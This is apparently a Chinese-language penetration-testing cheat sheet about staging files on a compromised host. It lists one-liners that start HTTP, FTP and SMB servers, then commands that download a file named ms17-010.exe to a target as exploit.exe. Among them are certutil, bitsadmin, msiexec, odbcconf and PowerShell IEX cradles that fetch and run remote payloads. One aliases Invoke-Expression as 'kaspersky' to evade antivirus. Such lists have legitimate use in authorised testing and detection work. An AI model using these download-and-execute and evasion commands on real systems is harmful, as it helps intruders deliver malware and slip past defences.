假设:要把 http://127.0.0.1:8080/ms17-010.exe 文件下载至本地命名为 exploit.exe
IP:127.0.0.1(下载地址)
Port:8080(端口)
Source File:ms17-010.exe(源文件)
Destination File:exploit.exe(目标文件)
1. HTTP Server(开启 HTTP 服务)
1.1 Python HTTP:
python -m SimpleHTTPServer 8080
1.2 Python3 HTTP:
python3 -m http.server 8080
1.3 Python FTP:
python -m pyftpdlib -p 8080
1.4 Python3 SMB:
python3 impacket-smbserver.py files . -port 8080
1.5 PHP 5.4+:
php -S 0.0.0.0:8080
1.6 Ruby:
ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 8080, :DocumentRoot => Dir.pwd).start'
1.7 Ruby 1.9.2+:
ruby -run -e httpd . -p 8080
1.7 busybox httpd:
busybox httpd -f -p 8080
2. Download the files(文件下载)
2.1 PowerShell - IWR:
powershell.exe -Command "Invoke-WebRequest -Uri http://127.0.0.1:8080/ms17-010.exe -OutFile exploit.exe"
2.2 PowerShell - IEX:
powershell.exe -Command "IEX(New-Object Net.WebClient).DownloadFile('http://127.0.0.1:8080/ms17-010.exe', exploit.exe)"
2.3 CMD - Certutil:
certutil.exe -urlcache -split -f http://127.0.0.1:8080/ms17-010.exe exploit.exe
2.4 CMD - SMB:
copy \\127.0.0.1\files\ms17-010.exe exploit.exe
2.5 Linux - wget:
wget http://127.0.0.1:8080/ms17-010.exe -O exploit.exe
2.6 Linux - curl:
curl http://127.0.0.1:8080/ms17-010.exe -o exploit.exe
2.7 Windows Bitsadmin:
bitsadmin /rawreturn /transfer down "http://127.0.0.1:8080/ms17-010.exe" c:\\exploit.exe
2.8 Windows msiexec:
msiexec /q /i http://127.0.0.1:8080/ms17-010.exe
2.9 Windows msiexec:
msiexec /q /%os:~1,1%http://127.0.0.1:8080/ms17-010.exe
2.10 Windows PowerShell:
powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object Net.WebClient).DownloadString('http://127.0.0.1:8080/payload.ps1')
2.11 Windows odbcconf:
执行包含特殊功能的DLL,这种DLL文件不需要使用.dll后缀,而且可以通过UNC/WebDAV下载
odbcconf /s /a {regsvr \\http://127.0.0.1:8080/\folder\payload_dll.txt}
2.12 Python Download:
python -c "import urllib2; exec urllib2.urlopen('http://127.0.0.1:8080/ms17-010.exe').read();"
2.13 Windows IPC$:
copy \127.0.0.1\c$\ms17-010.exe C:\exploit.exe